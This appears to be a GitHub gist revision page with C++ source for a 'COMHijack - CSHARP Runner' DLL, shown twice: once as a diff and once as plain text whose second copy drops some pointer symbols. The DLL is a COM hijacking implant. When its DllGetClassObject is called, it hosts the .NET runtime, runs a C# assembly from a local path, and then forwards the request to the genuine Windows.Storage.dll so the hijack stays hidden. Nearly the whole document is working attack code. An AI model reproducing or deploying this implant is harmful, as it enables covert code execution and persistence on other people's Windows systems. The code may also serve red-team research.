zaneGittins · April 24, 2020 02:54
diff --git a/gistfile1.txt b/gistfile1.txt
 /* 
 	COMHijack - CSHARP Runner
 	Author: Zane Gittins
 */

 #include <Windows.h>
 #include <comutil.h>
 #include <string>
 #include <fstream>
 #include <stdio.h>
 #include <MSCorEE.h>
 #include <MetaHost.h>
 #include <evntprov.h>
 #include <iostream>

 #pragma comment(lib, "mscoree.lib")

 using namespace std;

 typedef HRESULT(__stdcall *_DllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID* ppv);

 int ExecuteCSharp() {
 	ICLRMetaHost* metaHost = NULL;
 	IEnumUnknown* runtime = NULL;
 	ICLRRuntimeInfo* runtimeInfo = NULL;
 	ICLRRuntimeHost* runtimeHost = NULL;
 	IUnknown* enumRuntime = NULL;
 	LPWSTR frameworkName = NULL;
 	DWORD bytes = 2048, result = 0;

 	if (CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)& metaHost) != S_OK) {
 		return 2;
 	}

 	if (metaHost->EnumerateInstalledRuntimes(&runtime) != S_OK) {
 		return 2;
 	}

 	frameworkName = (LPWSTR)LocalAlloc(LPTR, 2048);
 	if (frameworkName == NULL) {
 		return 2;
 	}

 	while (runtime->Next(1, &enumRuntime, 0) == S_OK) {
 		if (enumRuntime->QueryInterface<ICLRRuntimeInfo>(&runtimeInfo) == S_OK) {
 			if (runtimeInfo != NULL) {
 				runtimeInfo->GetVersionString(frameworkName, &bytes);
 			}
 		}
 	}

 	result = runtimeInfo->SetDefaultStartupFlags(1, NULL);

 	if (runtimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)& runtimeHost) != S_OK) {
 		return 2;
 	}

 	runtimeHost->Start();

 	if (runtimeHost->ExecuteInDefaultAppDomain(
 		L"C:\\Users\\Researcher\\source\\repos\\Test\\Test\\bin\\Debug\\Test.dll",
 		L"Test.Program",
 		L"Main",
 		L"argtest",
 		&result
 	) != S_OK) {
 		return 2;
 	}

 	return 0;
 }

 BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
 {
 	switch (ul_reason_for_call)
 	{
 	case DLL_PROCESS_ATTACH:
 	{
 		break;
 	}
 	case DLL_PROCESS_DETACH:
 		break;
 	}
 	return TRUE;
 }

 STDAPI DllCanUnloadNow(void)
 {
 	return S_OK;
 }
 STDAPI DllRegisterServer(void)
 {
 	return S_OK;
 }
 STDAPI DllUnregisterServer(void)
 {
 	return S_OK;
 }

 STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)
 {
 	ExecuteCSharp();
 	HMODULE hDLL;
 	_DllGetClassObject lpGetClassObject;

 	LPOLESTR lplpsz;
 	HRESULT hResult = StringFromCLSID(rclsid, &lplpsz);
 	wchar_t* DLLName = new wchar_t[MAX_PATH];

 	hDLL = LoadLibrary(L"C:\\Windows\\system32\\Windows.Storage.dll");
 	if (hDLL == NULL)
 	{
 		return S_FALSE;
 	}

 	lpGetClassObject = (_DllGetClassObject)GetProcAddress(hDLL, "DllGetClassObject");
 	if (lpGetClassObject == NULL)
 	{
 		return S_FALSE;
 	}

 	HRESULT hr = lpGetClassObject(rclsid, riid, ppv);
 	return S_OK;
 }
	/*
	COMHijack - CSHARP Runner
	Author: Zane Gittins
	*/

	#include <Windows.h>
	#include <comutil.h>
	#include <string>
	#include <fstream>
	#include <stdio.h>
	#include <MSCorEE.h>
	#include <MetaHost.h>
	#include <evntprov.h>
	#include <iostream>

	#pragma comment(lib, "mscoree.lib")

	using namespace std;

	typedef HRESULT(__stdcall _DllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID ppv);

	int ExecuteCSharp() {
	ICLRMetaHost* metaHost = NULL;
	IEnumUnknown* runtime = NULL;
	ICLRRuntimeInfo* runtimeInfo = NULL;
	ICLRRuntimeHost* runtimeHost = NULL;
	IUnknown* enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	DWORD bytes = 2048, result = 0;

	if (CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)& metaHost) != S_OK) {
	return 2;
	}

	if (metaHost->EnumerateInstalledRuntimes(&runtime) != S_OK) {
	return 2;
	}

	frameworkName = (LPWSTR)LocalAlloc(LPTR, 2048);
	if (frameworkName == NULL) {
	return 2;
	}

	while (runtime->Next(1, &enumRuntime, 0) == S_OK) {
	if (enumRuntime->QueryInterface<ICLRRuntimeInfo>(&runtimeInfo) == S_OK) {
	if (runtimeInfo != NULL) {
	runtimeInfo->GetVersionString(frameworkName, &bytes);
	}
	}
	}

	result = runtimeInfo->SetDefaultStartupFlags(1, NULL);

	if (runtimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)& runtimeHost) != S_OK) {
	return 2;
	}

	runtimeHost->Start();

	if (runtimeHost->ExecuteInDefaultAppDomain(
	L"C:\\Users\\Researcher\\source\\repos\\Test\\Test\\bin\\Debug\\Test.dll",
	L"Test.Program",
	L"Main",
	L"argtest",
	&result
	) != S_OK) {
	return 2;
	}

	return 0;
	}

	BOOL APIENTRY DllMain( HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	)
	{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
	break;
	}
	case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
	}

	STDAPI DllCanUnloadNow(void)
	{
	return S_OK;
	}
	STDAPI DllRegisterServer(void)
	{
	return S_OK;
	}
	STDAPI DllUnregisterServer(void)
	{
	return S_OK;
	}

	STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv)
	{
	ExecuteCSharp();
	HMODULE hDLL;
	_DllGetClassObject lpGetClassObject;

	LPOLESTR lplpsz;
	HRESULT hResult = StringFromCLSID(rclsid, &lplpsz);
	wchar_t* DLLName = new wchar_t[MAX_PATH];

	hDLL = LoadLibrary(L"C:\\Windows\\system32\\Windows.Storage.dll");
	if (hDLL == NULL)
	{
	return S_FALSE;
	}

	lpGetClassObject = (_DllGetClassObject)GetProcAddress(hDLL, "DllGetClassObject");
	if (lpGetClassObject == NULL)
	{
	return S_FALSE;
	}

	HRESULT hr = lpGetClassObject(rclsid, riid, ppv);
	return S_OK;
	}